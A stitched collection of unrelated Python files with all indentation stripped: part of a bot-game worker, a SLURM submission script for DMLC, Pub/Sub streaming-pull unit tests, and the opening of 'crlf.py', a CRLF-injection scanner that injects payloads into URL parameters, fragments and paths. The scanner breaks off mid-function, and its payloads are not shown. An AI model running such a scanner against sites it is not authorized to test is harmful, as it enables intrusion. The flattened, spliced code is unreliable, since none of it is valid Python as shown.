# Julia's cache file stores absolute paths to source directories.
with open(os.path.join(bot_dir, "run.sh")) as lang_file:
lang = lang_file.readline().strip().lower()
if lang == "#julia":
for command in JULIA_PRECOMPILE_COMMANDS:
cmd = COMPILE_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
command=command.format(bot_dir=bot_dir),
)
print("Precompiling Julia:", cmd)
subprocess.run(cmd, cwd=bot_dir, shell=True)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
logging.debug(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
slurm.py
|
"""
DMLC submission script, SLURM version
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import subprocess, logging
from threading import Thread
from . import tracker
def get_mpi_env(envs):
"""get the slurm command for setting the environment
"""
cmd = ''
for k, v in envs.items():
cmd += '%s=%s ' % (k, str(v))
return cmd
def submit(args):
"""Submission script with SLURM."""
def mpi_submit(nworker, nserver, pass_envs):
"""Internal closure for job submission."""
def run(prog):
"""run the program"""
subprocess.check_call(prog, shell=True)
cmd = ' '.join(args.command)
pass_envs['DMLC_JOB_CLUSTER'] = 'slurm'
if args.slurm_worker_nodes is None:
nworker_nodes = nworker
else:
nworker_nodes=args.slurm_worker_nodes
# start workers
if nworker > 0:
logging.info('Start %d workers by srun' % nworker)
pass_envs['DMLC_ROLE'] = 'worker'
prog = '%s srun --share --exclusive=user -N %d -n %d %s' % (get_mpi_env(pass_envs), nworker_nodes, nworker, cmd)
thread = Thread(target=run, args=(prog,))
thread.setDaemon(True)
thread.start()
if args.slurm_server_nodes is None:
nserver_nodes = nserver
else:
nserver_nodes=args.slurm_server_nodes
# start servers
if nserver > 0:
logging.info('Start %d servers by srun' % nserver)
pass_envs['DMLC_ROLE'] = 'server'
prog = '%s srun --share --exclusive=user -N %d -n %d %s' % (get_mpi_env(pass_envs), nserver_nodes, nserver, cmd)
thread = Thread(target=run, args=(prog,))
thread.setDaemon(True)
thread.start()
tracker.submit(args.num_workers, args.num_servers,
fun_submit=mpi_submit,
pscmd=(' '.join(args.command)))
|
test_streaming_pull_manager.py
|
# Copyright 2018, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from six.moves import queue
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.gapic import subscriber_client_config
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
import grpc
@pytest.mark.parametrize(
"exception,expected_cls",
[
(ValueError("meep"), ValueError),
(
mock.create_autospec(grpc.RpcError, instance=True),
exceptions.GoogleAPICallError,
),
],
)
def test__maybe_wrap_exception(exception, expected_cls):
assert isinstance(
streaming_pull_manager._maybe_wrap_exception(exception), expected_cls
)
def test__wrap_callback_errors_no_error():
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock()
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
callback.assert_called_once_with(msg)
msg.nack.assert_not_called()
on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
callback_error = ValueError("meep")
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock(side_effect=callback_error)
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
msg.nack.assert_called_once()
on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client, mock.sentinel.subscription
)
# Public state
assert manager.is_active is False
assert manager.flow_control == types.FlowControl()
assert manager.dispatcher is None
assert manager.leaser is None
assert manager.ack_histogram is not None
assert manager.ack_deadline == 10
assert manager.load == 0
# Private state
assert manager._client == mock.sentinel.client
assert manager._subscription == mock.sentinel.subscription
assert manager._scheduler is not None
def test_constructor_with_options():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client,
mock.sentinel.subscription,
flow_control=mock.sentinel.flow_control,
scheduler=mock.sentinel.scheduler,
)
assert manager.flow_control == mock.sentinel.flow_control
assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
client_ = mock.create_autospec(client.Client, instance=True)
scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
return streaming_pull_manager.StreamingPullManager(
client_, "subscription-name", scheduler=scheduler_, **kwargs
)
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
"""Add a simplified fake add() method to a leaser instance.
The fake add() method actually increases the leaser's internal message count
by one for each message, and the total bytes by ``assumed_msg_size`` for
each message (regardless of the actual message size).
"""
def fake_add(self, items):
self.message_count += len(items)
self.bytes += len(items) * assumed_msg_size
leaser.message_count = init_msg_count
leaser.bytes = init_msg_count * assumed_msg_size
leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
manager = make_manager()
assert manager.ack_deadline == 10
manager.ack_histogram.add(20)
assert manager.ack_deadline == 20
manager.ack_histogram.add(10)
assert manager.ack_deadline == 20
def test_maybe_pause_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_pause_consumer() # no raise
# Ensure load > 1
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 100
_leaser.bytes = 10000
manager.maybe_pause_consumer() # no raise
def test_lease_load_and_pause():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# This should mean that our messages count is at 10%, and our bytes
# are at 15%; load should return the higher (0.15), and shouldn't cause
# the consumer to pause.
manager.leaser.add([requests.LeaseRequest(ack_id="one", byte_size=150)])
assert manager.load == 0.15
manager.maybe_pause_consumer()
manager._consumer.pause.assert_not_called()
# After this message is added, the messages should be higher at 20%
# (versus 16% for bytes).
manager.leaser.add([requests.LeaseRequest(ack_id="two", byte_size=10)])
assert manager.load == 0.2
# Returning a number above 100% is fine, and it should cause this to pause.
manager.leaser.add([requests.LeaseRequest(ack_id="three", byte_size=1000)])
assert manager.load == 1.16
manager.maybe_pause_consumer()
manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = True
# Add several messages until we're over the load threshold.
manager.leaser.add(
[
requests.LeaseRequest(ack_id="one", byte_size=750),
requests.LeaseRequest(ack_id="two", byte_size=250),
]
)
assert manager.load == 1.0
# Trying to resume now should have no effect as we're over the threshold.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
# Drop the 200 byte message, which should put us under the resume
# threshold.
manager.leaser.remove([requests.DropRequest(ack_id="two", byte_size=250)])
manager.maybe_resume_consumer()
manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# Resuming should have no effect is the consumer is not actually paused.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_resume_consumer() # no raise
def test__maybe_release_messages_on_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
# Ensure load is exactly 1.0 (to verify that >= condition is used)
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 10
_leaser.bytes = 1000
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
manager._messages_on_hold.put(msg)
manager._maybe_release_messages()
assert manager._messages_on_hold.qsize() == 1
manager._leaser.add.assert_not_called()
manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._callback = mock.sentinel.callback
# init leaser message count to 8 to leave room for 2 more messages
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
fake_leaser_add(_leaser, init_msg_count=8, assumed_msg_size=25)
_leaser.add = mock.Mock(wraps=_leaser.add) # to spy on calls
messages = [
mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=11),
mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=22),
mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=33),
]
for msg in messages:
manager._messages_on_hold.put(msg)
# the actual call of MUT
manager._maybe_release_messages()
assert manager._messages_on_hold.qsize() == 1
msg = manager._messages_on_hold.get_nowait()
assert msg.ack_id == "ack_baz"
assert len(_leaser.add.mock_calls) == 2
expected_calls = [
mock.call([requests.LeaseRequest(ack_id="ack_foo", byte_size=11)]),
mock.call([requests.LeaseRequest(ack_id="ack_bar", byte_size=22)]),
]
_leaser.add.assert_has_calls(expected_calls)
schedule_calls = manager._scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for _, call_args, _ in schedule_calls:
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test_send_unary():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(
types.StreamingPullRequest(
ack_ids=["ack_id1", "ack_id2"],
modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
modify_deadline_seconds=[10, 20, 20],
)
)
manager._client.acknowledge.assert_called_once_with(
subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
)
manager._client.modify_ack_deadline.assert_has_calls(
[
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id3"],
ack_deadline_seconds=10,
),
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id4", "ack_id5"],
ack_deadline_seconds=20,
),
],
any_order=True,
)
def test_send_unary_empty():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(types.StreamingPullRequest())
manager._client.acknowledge.assert_not_called()
manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
caplog.set_level(logging.DEBUG)
manager = make_manager()
manager._UNARY_REQUESTS = True
error = exceptions.GoogleAPICallError("The front fell off")
manager._client.acknowledge.side_effect = error
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
caplog.set_level(logging.DEBUG)
manager, _, _, _, _, _ = make_running_manager()
manager._UNARY_REQUESTS = True
error = exceptions.RetryError(
"Too long a transient error", cause=Exception("Out of time!")
)
manager._client.acknowledge.side_effect = error
with pytest.raises(exceptions.RetryError):
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "RetryError while sending unary RPC" in caplog.text
assert "signaled streaming pull manager shutdown" in caplog.text
def test_send_streaming():
manager = make_manager()
manager._UNARY_REQUESTS = False
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager.send(mock.sentinel.request)
manager._rpc.send.assert_called_once_with(mock.sentinel.request)
def test_heartbeat():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = True
manager.heartbeat()
manager._rpc.send.assert_called_once_with(types.StreamingPullRequest())
def test_heartbeat_inactive():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = False
manager.heartbeat()
manager._rpc.send.assert_not_called()
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
stream_ack_deadline = streaming_pull_manager._DEFAULT_STREAM_ACK_DEADLINE
manager = make_manager()
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
heartbeater.assert_called_once_with(manager)
heartbeater.return_value.start.assert_called_once()
assert manager._heartbeater == heartbeater.return_value
dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
dispatcher.return_value.start.assert_called_once()
assert manager._dispatcher == dispatcher.return_value
leaser.assert_called_once_with(manager)
leaser.return_value.start.assert_called_once()
assert manager.leaser == leaser.return_value
background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
background_consumer.return_value.start.assert_called_once()
assert manager._consumer == background_consumer.return_value
resumable_bidi_rpc.assert_called_once_with(
start_rpc=manager._client.api.streaming_pull,
initial_request=mock.ANY,
should_recover=manager._should_recover,
should_terminate=manager._should_terminate,
throttle_reopen=True,
)
initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
assert initial_request_arg.func == manager._get_initial_request
assert initial_request_arg.args[0] == stream_ack_deadline
assert not manager._client.api.get_subscription.called
resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
manager._on_rpc_done
)
assert manager._rpc == resumable_bidi_rpc.return_value
manager._consumer.is_active = True
assert manager.is_active is True
def test_open_already_active():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
with pytest.raises(ValueError, match="already open"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
manager = make_manager()
manager._closed = True
with pytest.raises(ValueError, match="closed"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def make_running_manager():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
return (
manager,
manager._consumer,
manager._dispatcher,
manager._leaser,
manager._heartbeater,
manager._scheduler,
)
def test_close():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
manager.close()
consumer.stop.assert_called_once()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
assert manager.is_active is False
def test_close_inactive_consumer():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
consumer.is_active = False
manager.close()
consumer.stop.assert_not_called()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
def test_close_idempotent():
manager, _, _, _, _, scheduler = make_running_manager()
manager.close()
manager.close()
assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
def __init__(self, manager, error_callback):
self._manager = manager
self._error_callback = error_callback
self._thread = None
self._stop = False
def start(self):
self._thread = threading.Thread(target=self._do_work)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
self._thread.join()
self._thread = None
def _do_work(self):
while not self._stop:
try:
self._manager.leaser.add([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
time.sleep(0.1)
# also try to interact with the leaser after the stop flag has been set
try:
self._manager.leaser.remove([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
def test_close_no_dispatcher_error():
manager, _, _, _, _, _ = make_running_manager()
error_callback = mock.Mock(name="error_callback")
dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
manager._dispatcher = dispatcher
dispatcher.start()
manager.close()
error_callback.assert_not_called()
def test_close_callbacks():
manager, _, _, _, _, _ = make_running_manager()
callback = mock.Mock()
manager.add_close_callback(callback)
manager.close(reason="meep")
callback.assert_called_once_with(manager, "meep")
def test__get_initial_request():
manager = make_manager()
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._leaser.ack_ids = ["1", "2"]
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == ["1", "2"]
assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
manager = make_manager()
manager._leaser = None
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == []
assert initial_request.modify_deadline_seconds == []
def test__on_response_no_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for call in schedule_calls:
assert call[1][0] == mock.sentinel.callback
assert isinstance(call[1][1], message.Message)
# the leaser load limit not hit, no messages had to be put on hold
assert manager._messages_on_hold.qsize() == 0
def test__on_response_with_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
types.ReceivedMessage(
ack_id="zack", message=types.PubsubMessage(data=b"baz", message_id="3")
),
]
)
# Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
# the default FlowControl.max_messages limit.
fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
# only the messages that are added to the lease management and dispatched to
# callbacks should have their ACK deadline extended
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10)]
)
# one message should be scheduled, the leaser capacity allows for it
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 1
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
# the rest of the messages should have been put on hold
assert manager._messages_on_hold.qsize() == 2
while True:
try:
msg = manager._messages_on_hold.get_nowait()
except queue.Empty:
break
else:
assert isinstance(msg, message.Message)
assert msg.message_id in ("2", "3")
def test_retryable_stream_errors():
# Make sure the config matches our hard-coded tuple of exceptions.
interfaces = subscriber_client_config.config["interfaces"]
retry_codes = interfaces["google.pubsub.v1.Subscriber"]["retry_codes"]
idempotent = retry_codes["idempotent"]
status_codes = tuple(getattr(grpc.StatusCode, name, None) for name in idempotent)
expected = tuple(
exceptions.exception_class_for_grpc_status(status_code)
for status_code in status_codes
)
assert set(expected).issubset(set(streaming_pull_manager._RETRYABLE_STREAM_ERRORS))
def test__should_recover_true():
manager = make_manager()
details = "UNAVAILABLE. Service taking nap."
exc = exceptions.ServiceUnavailable(details)
assert manager._should_recover(exc) is True
def test__should_recover_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_recover(exc) is False
def test__should_terminate_true():
manager = make_manager()
details = "Cancelled. Go away, before I taunt you a second time."
exc = exceptions.Cancelled(details)
assert manager._should_terminate(exc) is True
def test__should_terminate_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_terminate(exc) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
manager = make_manager()
manager._on_rpc_done(mock.sentinel.error)
thread.assert_called_once_with(
name=mock.ANY, target=manager.close, kwargs={"reason": mock.sentinel.error}
)
|
crlf.py
|
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import copy
import random
import argparse
import requests
import urllib.parse
from functools import partial
from threading import Thread
from queue import Queue
from multiprocessing.dummy import Pool
from colored import fg, bg, attr
MAX_EXCEPTION = 3
MAX_VULNERABLE = 5
# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def banner():
print("""
_ __
___ _ __| |/ _| _ __ _ _
/ __| '__| | |_ | '_ \| | | |
| (__| | | | _| _ | |_) | |_| |
\___|_| |_|_| (_) | .__/ \__, |
|_| |___/
by @gwendallecoguic
""")
pass
banner()
def rebuiltQuery( t_params ):
query = ''
for pname,t_values in t_params.items():
for k in range(len(t_values)):
query = query + pname+'='+t_values[k] + '&'
return query.strip('&')
def _parse_qs( query ):
t_params = {}
tmptab = query.split('&')
for param in tmptab:
t_param = param.split('=')
pname = t_param[0]
if not pname in t_params:
t_params[pname] = []
pvalue = '' if len(t_param) < 2 else t_param[1]
t_params[pname].append( pvalue )
return t_params
def testParams( t_urlparse, payload ):
# t_params = urllib.parse.parse_qs( t_urlparse.query )
t_params = _parse_qs( t_urlparse.query )
for pname,t_values in t_params.items():
for k in range(len(t_values)):
pvalue = t_values[k]
t_params2 = copy.deepcopy(t_params)
if pvalue == '':
pvalue = 666
new_value = str(pvalue) + payload
# t_params2[pname][k] = urllib.parse.quote( new_value )
t_params2[pname][k] = new_value
new_query = rebuiltQuery( t_params2 )
t_urlparse = t_urlparse._replace(query=new_query)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
# disable get/post swap
# t_urlparse = t_urlparse._replace(query='')
# url = urllib.parse.urlunparse(t_urlparse)
# doTest( url, 'POST', t_params2 )
def testFragment( t_urlparse, payload ):
# new_value = t_urlparse.fragment + urllib.parse.quote(payload)
new_value = t_urlparse.fragment + payload
t_urlparse = t_urlparse._replace(fragment=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
def testPath( t_urlparse, payload ):
path = ''
t_path = ['/'] + t_urlparse.path.split('/')
for dir in t_path:
if len(dir):
path = path + '/' + dir
path = path.replace('//','/')
# new_value = os.path.dirname(t_urlparse.path) + '/' + urllib.parse.quote(payload)
# new_value = path + '/' + urllib.parse.quote(payload)
new_value = path + '/' + payload
new_value = new_value.replace('//','/')
t_urlparse = t_urlparse._replace(path=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
def testPayload( url, payload ):
t_urlparse = urllib.parse.urlparse( url )
if len(t_urlparse.query):
testParams( t_urlparse, payload.strip('/') )
if len(t_urlparse.fragment):
testFragment( t_urlparse, payload.strip('/') )
testPath( t_urlparse, payload )
def testURL( url ):
time.sleep( 0.01 )
if _verbose <= 1:
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
pool = Pool( 10 )
pool.map( partial(testPayload,url), t_payloads )
pool.close()
pool.join()
def doTest( url, method='GET', post_params='' ):
t_urlparse = urllib.parse.urlparse(url)
u = t_urlparse.scheme + '_' + t_urlparse.netloc
if not u in t_exceptions:
t_exceptions[u] = 0
